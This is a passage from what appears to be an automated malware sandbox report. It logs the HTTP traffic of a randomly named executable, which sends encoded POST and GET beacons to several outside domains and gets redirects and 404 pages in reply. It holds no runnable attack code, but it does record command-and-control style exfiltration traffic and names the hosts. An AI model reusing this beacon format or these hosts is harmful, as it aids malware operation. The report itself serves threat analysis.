                                                                                  Data Raw: 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 31 0d 0a 0a 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 13a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>10


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  1192.168.2.64996676.223.74.74803320C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 20, 2024 08:32:04.926918983 CET828OUTPOST /5rfk/ HTTP/1.1
                                                                                  Host: www.grandesofertas.fun
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 213
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.grandesofertas.fun
                                                                                  Referer: http://www.grandesofertas.fun/5rfk/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Raw: 47 52 35 34 79 48 5a 38 3d 68 42 52 54 58 56 5a 5a 6f 71 66 46 51 34 64 6c 42 61 66 6e 62 43 43 38 46 59 56 39 4e 4f 58 38 7a 4f 42 53 79 57 6e 54 44 55 43 54 6b 6e 61 4d 48 6d 4e 32 5a 38 75 69 72 76 57 4c 53 32 4c 71 42 38 6c 56 31 51 36 50 4c 52 43 68 6d 30 6f 56 46 50 6b 79 74 6c 6c 61 31 47 71 63 75 57 71 53 34 78 67 4b 6a 57 75 36 4d 66 39 58 6c 42 49 30 52 4b 51 67 70 58 4b 57 6b 4a 31 4c 76 57 2f 4d 35 37 66 4d 45 7a 70 33 6c 69 6e 46 5a 59 71 65 66 30 39 49 38 42 61 41 44 2b 6b 71 39 41 41 52 4b 45 31 78 44 55 43 4d 33 37 45 4b 56 30 61 36 68 65 72 55 48 57 35 77 34 54 70 32 79 73 44 6b 52 4a 41 75 61 4d 33 78 74 42 47 46
                                                                                  Data Ascii: GR54yHZ8=hBRTXVZZoqfFQ4dlBafnbCC8FYV9NOX8zOBSyWnTDUCTknaMHmN2Z8uirvWLS2LqB8lV1Q6PLRChm0oVFPkytlla1GqcuWqS4xgKjWu6Mf9XlBI0RKQgpXKWkJ1LvW/M57fMEzp3linFZYqef09I8BaAD+kq9AARKE1xDUCM37EKV0a6herUHW5w4Tp2ysDkRJAuaM3xtBGF
                                                                                  Nov 20, 2024 08:32:05.409843922 CET456INHTTP/1.1 301 Moved Permanently
                                                                                  Server: nginx
                                                                                  Date: Wed, 20 Nov 2024 07:32:05 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 162
                                                                                  Connection: close
                                                                                  Location: https://www.grandesofertas.fun/5rfk/
                                                                                  X-Content-Type-Options: nosniff
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  X-XSS-Protection: 1; mode=block
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  2192.168.2.64998676.223.74.74803320C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 20, 2024 08:32:07.473522902 CET852OUTPOST /5rfk/ HTTP/1.1
                                                                                  Host: www.grandesofertas.fun
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 237
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.grandesofertas.fun
                                                                                  Referer: http://www.grandesofertas.fun/5rfk/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Raw: 47 52 35 34 79 48 5a 38 3d 68 42 52 54 58 56 5a 5a 6f 71 66 46 52 59 74 6c 48 39 44 6e 4b 53 43 37 4a 34 56 39 44 75 58 34 7a 4f 4e 53 79 56 72 35 43 67 75 54 6b 46 43 4d 64 69 5a 32 65 38 75 69 34 76 57 4f 63 57 4c 31 42 38 68 64 31 52 47 50 4c 56 71 68 6d 30 59 56 47 2b 6b 78 73 31 6c 59 35 6d 71 53 71 57 71 53 34 78 67 4b 6a 57 37 66 4d 66 31 58 6b 78 34 30 52 76 38 2f 33 48 4b 56 7a 35 31 4c 72 57 2f 49 35 37 66 79 45 33 4a 52 6c 6e 6a 46 5a 59 61 65 65 6d 46 4c 79 42 62 4a 63 4f 6c 74 34 68 30 55 46 6b 73 69 41 54 36 76 6e 73 4a 70 51 43 48 67 39 74 72 33 56 47 5a 79 34 52 78 45 79 4d 44 4f 54 4a 34 75 49 62 37 57 69 31 6a 6d 4d 43 7a 7a 45 51 6f 69 32 69 46 51 44 5a 5a 54 6c 31 77 4b 38 77 3d 3d
                                                                                  Data Ascii: GR54yHZ8=hBRTXVZZoqfFRYtlH9DnKSC7J4V9DuX4zONSyVr5CguTkFCMdiZ2e8ui4vWOcWL1B8hd1RGPLVqhm0YVG+kxs1lY5mqSqWqS4xgKjW7fMf1Xkx40Rv8/3HKVz51LrW/I57fyE3JRlnjFZYaeemFLyBbJcOlt4h0UFksiAT6vnsJpQCHg9tr3VGZy4RxEyMDOTJ4uIb7Wi1jmMCzzEQoi2iFQDZZTl1wK8w==
                                                                                  Nov 20, 2024 08:32:07.970556974 CET456INHTTP/1.1 301 Moved Permanently
                                                                                  Server: nginx
                                                                                  Date: Wed, 20 Nov 2024 07:32:07 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 162
                                                                                  Connection: close
                                                                                  Location: https://www.grandesofertas.fun/5rfk/
                                                                                  X-Content-Type-Options: nosniff
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  X-XSS-Protection: 1; mode=block
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  3192.168.2.64998776.223.74.74803320C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 20, 2024 08:32:10.020680904 CET1865OUTPOST /5rfk/ HTTP/1.1
                                                                                  Host: www.grandesofertas.fun
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 1249
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.grandesofertas.fun
                                                                                  Referer: http://www.grandesofertas.fun/5rfk/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Raw: 47 52 35 34 79 48 5a 38 3d 68 42 52 54 58 56 5a 5a 6f 71 66 46 52 59 74 6c 48 39 44 6e 4b 53 43 37 4a 34 56 39 44 75 58 34 7a 4f 4e 53 79 56 72 35 43 68 36 54 6c 77 65 4d 48 46 31 32 66 38 75 69 6a 50 57 50 63 57 4c 34 42 34 4e 5a 31 52 4b 31 4c 54 75 68 67 6e 67 56 44 4d 63 78 6d 31 6c 59 78 47 71 54 75 57 71 48 34 78 77 47 6a 57 72 66 4d 66 31 58 6b 33 55 30 59 61 51 2f 31 48 4b 57 6b 4a 30 45 76 57 2f 67 35 2f 4c 39 45 33 4d 71 6c 55 62 46 5a 38 2b 65 64 56 39 4c 74 78 62 48 66 4f 6c 50 34 68 70 45 46 6b 41 75 41 57 75 4a 6e 72 42 70 52 55 79 6e 35 4a 76 4f 50 32 56 4e 6d 51 34 68 7a 38 50 4c 53 49 56 51 4a 4b 6e 41 39 68 54 55 50 32 7a 71 4e 42 45 76 67 68 78 65 48 64 67 57 6a 55 6c 38 6d 48 57 36 33 43 45 67 2b 45 6f 58 77 6d 47 30 50 43 67 66 37 50 70 54 70 69 33 45 36 65 74 53 6c 55 77 71 77 67 66 4f 37 52 78 75 32 70 49 59 63 68 2f 76 71 67 71 63 75 70 62 34 6a 72 6a 7a 34 58 37 47 73 36 66 68 68 44 57 32 37 34 6b 48 4b 72 2f 66 41 4a 57 33 4e 47 73 30 7a 5a 4d 34 68 69 34 65 7a 33 69 6b 31 [TRUNCATED]
                                                                                  Data Ascii: GR54yHZ8=hBRTXVZZoqfFRYtlH9DnKSC7J4V9DuX4zONSyVr5Ch6TlweMHF12f8uijPWPcWL4B4NZ1RK1LTuhgngVDMcxm1lYxGqTuWqH4xwGjWrfMf1Xk3U0YaQ/1HKWkJ0EvW/g5/L9E3MqlUbFZ8+edV9LtxbHfOlP4hpEFkAuAWuJnrBpRUyn5JvOP2VNmQ4hz8PLSIVQJKnA9hTUP2zqNBEvghxeHdgWjUl8mHW63CEg+EoXwmG0PCgf7PpTpi3E6etSlUwqwgfO7Rxu2pIYch/vqgqcupb4jrjz4X7Gs6fhhDW274kHKr/fAJW3NGs0zZM4hi4ez3ik1QUV2Uqve0A7ElT5dnpgntr06wrMUogCBI2wloZoAE7fLRGdNcnGRE9xj9ezWwwfmmbHDkTyS2r8wVHCKM8vvasnu2hvNf0gQTdmTQGimPM1VTzbR+PaFtYWwMjHjvIs0Mq274hA1GglbEaSVSAPSilaxy6W54Oy4DZYoTU32WYWEXLEqdwvY96d41sxWr8AX6xhRu9jLpxWj33KeNCQ0dm4BwN+z5z8wZT/wnUd+XDdW7N+ldWr8cxdPG4RVyXldBj/FY3knA0vCl3SYW+cOIpvnuUutTHr3ljYxo/Sl01qTtWs+QKZzbsJn4gGz3eU/DPkYfKNnUKWxfM9TDtjrWGvTFa1dUJkxi6iK+thwP7urjT5mDKMGsdE3o4bjHLIglGXRBTvOW7CuZPsANjalhYSYT/PozyqgSXfExE67kLXeFXclpB+gkYtfn1eIxGmDVDFtPmVh9vhjqILWJIvDUGhHfI7u4ukxCFSJ2KgQugSkU5r5yeLSjSM/5PyUI0W/CL4uzdd9ke/rSOU+3z1XbRj3GCU1jS/LCJ1Mx5UJk24oS6HiDZ9X/Zieb0/vKX2mXmvKRLDfPsryUo6PErChx/TobjliR8w+vOsSVRh8T4DEJ77kih5vCwz+L8wRV5JJjq8cIdoc+PftEHPKIgudoG2HScZraf9m5R [TRUNCATED]
                                                                                  Nov 20, 2024 08:32:10.547473907 CET456INHTTP/1.1 301 Moved Permanently
                                                                                  Server: nginx
                                                                                  Date: Wed, 20 Nov 2024 07:32:10 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 162
                                                                                  Connection: close
                                                                                  Location: https://www.grandesofertas.fun/5rfk/
                                                                                  X-Content-Type-Options: nosniff
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  X-XSS-Protection: 1; mode=block
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  4192.168.2.64998976.223.74.74803320C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 20, 2024 08:32:12.567233086 CET560OUTGET /5rfk/?GR54yHZ8=sD5zUlt3wbrvSr53X/LgfhW+OptFCrWooNx2zE35RlOZ6Ff5bUgKRp+BgbOlYXfZZMl91myXHSHWgEoZCPkWwn0n+VmG53SX0EAb83CrCeMIkzMnSL4JpBihhagjpE3GksySBz8=&9xn=fHadNpk8MVax HTTP/1.1
                                                                                  Host: www.grandesofertas.fun
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Nov 20, 2024 08:32:13.073115110 CET619INHTTP/1.1 301 Moved Permanently
                                                                                  Server: nginx
                                                                                  Date: Wed, 20 Nov 2024 07:32:12 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 162
                                                                                  Connection: close
                                                                                  Location: https://www.grandesofertas.fun/5rfk/?GR54yHZ8=sD5zUlt3wbrvSr53X/LgfhW+OptFCrWooNx2zE35RlOZ6Ff5bUgKRp+BgbOlYXfZZMl91myXHSHWgEoZCPkWwn0n+VmG53SX0EAb83CrCeMIkzMnSL4JpBihhagjpE3GksySBz8=&9xn=fHadNpk8MVax
                                                                                  X-Content-Type-Options: nosniff
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  X-XSS-Protection: 1; mode=block
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  5192.168.2.649990163.44.185.183803320C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 20, 2024 08:32:18.568269968 CET831OUTPOST /21k5/ HTTP/1.1
                                                                                  Host: www.sankan-fukushi.info
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 213
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.sankan-fukushi.info
                                                                                  Referer: http://www.sankan-fukushi.info/21k5/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Raw: 47 52 35 34 79 48 5a 38 3d 53 55 7a 47 6e 75 76 48 71 6a 72 64 77 50 67 70 42 65 7a 5a 47 62 68 43 77 59 4d 64 68 2b 58 77 4a 6b 4d 5a 67 39 6e 34 49 66 79 6f 35 39 37 43 4b 36 45 64 38 67 4e 6f 52 41 37 70 68 35 36 4f 4c 78 46 48 43 37 74 63 46 36 66 47 41 79 73 37 67 53 73 77 57 4f 76 41 49 41 34 37 6b 78 75 46 70 52 74 64 6a 75 65 30 57 74 61 52 53 6a 73 6f 36 55 65 53 57 4b 46 73 66 48 6a 59 59 6c 32 59 65 6f 6a 78 77 4e 49 54 56 30 37 50 4e 4f 72 63 39 4f 73 5a 79 59 6a 6d 45 4e 4c 72 77 79 63 33 30 2f 49 75 4b 4b 48 49 78 33 33 46 36 5a 5a 70 48 4d 50 37 4c 6c 63 46 4b 35 4d 4a 65 42 65 4d 6b 6c 39 79 34 39 30 47 48 67 4f 45
                                                                                  Data Ascii: GR54yHZ8=SUzGnuvHqjrdwPgpBezZGbhCwYMdh+XwJkMZg9n4Ifyo597CK6Ed8gNoRA7ph56OLxFHC7tcF6fGAys7gSswWOvAIA47kxuFpRtdjue0WtaRSjso6UeSWKFsfHjYYl2YeojxwNITV07PNOrc9OsZyYjmENLrwyc30/IuKKHIx33F6ZZpHMP7LlcFK5MJeBeMkl9y490GHgOE
                                                                                  Nov 20, 2024 08:32:19.343815088 CET1236INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 20 Nov 2024 07:32:19 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 19268
                                                                                  Connection: close
                                                                                  Server: Apache
                                                                                  Last-Modified: Tue, 25 Jan 2022 07:25:35 GMT
                                                                                  Accept-Ranges: bytes
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html lang="ja"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>404 Error - Not Found</title> <style> html,body,h1,p { margin: 0; padding: 0; } body,html { height: 100%; text-align: center; font-family: -apple-system, BlinkMacSystemFont, YakuHanJP, Helvetica, , "Hiragino Sans", " ProN W3", "Hiragino Kaku Gothic ProN", Verdana, Meiryo, sans-serif; background: #fff; color: #403230; } .container { padding: 60px 30px; } @media screen and (min-width: 640px) { .container { padding: 100px 30px; } } h1 { letter-spacing: 0.05em; font-size: 2.4rem; margin-bottom: 20px; } a { color: #147EF0; } .lol-error-page__caption { text-align: center; font-size: 1rem; [TRUNCATED]
                                                                                  Nov 20, 2024 08:32:19.343837976 CET224INData Raw: 2d 77 65 69 67 68 74 3a 20 36 30 30 3b 0a 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 37 32 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 69 6e 66 6f 72 6d 61 74 69 6f
                                                                                  Data Ascii: -weight: 600; line-height: 1.72; } .lol-error-page__information { display: -webkit-flex; display: -ms-flexbox; display: flex; -webkit-justify-content: center;
                                                                                  Nov 20, 2024 08:32:19.343848944 CET1236INData Raw: 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 61
                                                                                  Data Ascii: -ms-flex-pack: center; justify-content: center; -webkit-align-items: center; -ms-flex-align: center; align-items: center; -webkit-flex-wrap: wrap; -ms-flex-wrap: wrap;
                                                                                  Nov 20, 2024 08:32:19.343940973 CET1236INData Raw: 3a 20 6d 69 64 64 6c 65 3b 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 36 70 78 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 63 33 3b 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 6f 72
                                                                                  Data Ascii: : middle; border-radius: 6px; background: #fc3; -webkit-order: 1; -ms-flex-order: 1; order: 1; } .lol-error-page__information-balloon::after { position: absolute; z-index: 1;
                                                                                  Nov 20, 2024 08:32:19.343952894 CET1236INData Raw: 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 61 64 2d 62 61 6e 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69
                                                                                  Data Ascii: } .lol-error-page__ad-banner { text-align:center; margin: 15px auto 20px; } .lol-error-page__ad-banner-holizontal { width: 300px; height: auto; margin: auto; } @media s
                                                                                  Nov 20, 2024 08:32:19.344062090 CET1236INData Raw: 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 30 22 20 68 65 69 67 68 74 3d 22 31 34 32 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 35 20 31 34 38 22 3e 3c 67 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 70 61 74 68 20 66
                                                                                  Data Ascii: rg/2000/svg" width="100" height="142" viewBox="0 0 105 148"><g fill="none"><path fill="#f60" d="M87.7 52.376c-.742-3.291-1.243-6.631-1.5-9.994.943-3.251 4.968-18.858-3.232-30.342-5.627-7.931-15.639-12.04-29.9-12.04h-.329c-14.1 0-24.317 3.988-3
                                                                                  Nov 20, 2024 08:32:19.344161987 CET1236INData Raw: 2e 35 31 34 2e 33 39 36 20 31 2e 31 35 33 2e 35 39 34 20 31 2e 38 2e 35 35 37 20 31 2e 34 34 31 2e 33 31 35 20 32 2e 39 31 38 2d 2e 33 35 32 20 33 2e 36 33 36 2d 31 2e 36 34 31 2e 38 35 31 2d 31 2e 39 34 31 20 31 2e 32 39 33 2d 34 2e 30 33 37 20
                                                                                  Data Ascii: .514.396 1.153.594 1.8.557 1.441.315 2.918-.352 3.636-1.641.851-1.941 1.293-4.037 1.3-6.156.258-2.084.09-4.199-.494-6.216-.544-1.376-1.926-2.233-3.4-2.107l-.402-.015z"/><path fill="#f60" d="M51.976 102.7c-.463 0-.908-.179-1.242-.5l-11.044-10.5
                                                                                  Nov 20, 2024 08:32:19.344175100 CET1236INData Raw: 2d 2e 33 37 33 2d 33 2e 36 32 31 2d 31 2e 36 37 31 2d 2e 38 32 34 2d 31 2e 39 33 32 2d 31 2e 32 34 36 2d 34 2e 30 31 31 2d 31 2e 32 34 31 2d 36 2e 31 31 31 2d 2e 33 38 39 2d 36 2e 37 38 38 20 31 2e 30 33 33 2d 38 2e 31 32 37 20 33 2e 39 36 36 2d
                                                                                  Data Ascii: -.373-3.621-1.671-.824-1.932-1.246-4.011-1.241-6.111-.389-6.788 1.033-8.127 3.966-8.293h.4c.392-.013.783.049 1.152.181-.185 1.468-.28 2.946-.284 4.425-.01 3.674.495 7.332 1.5 10.866l-.072.061zm26.365 19.475h-.15c-10.071 0-18.9-8.293-22.447-19.
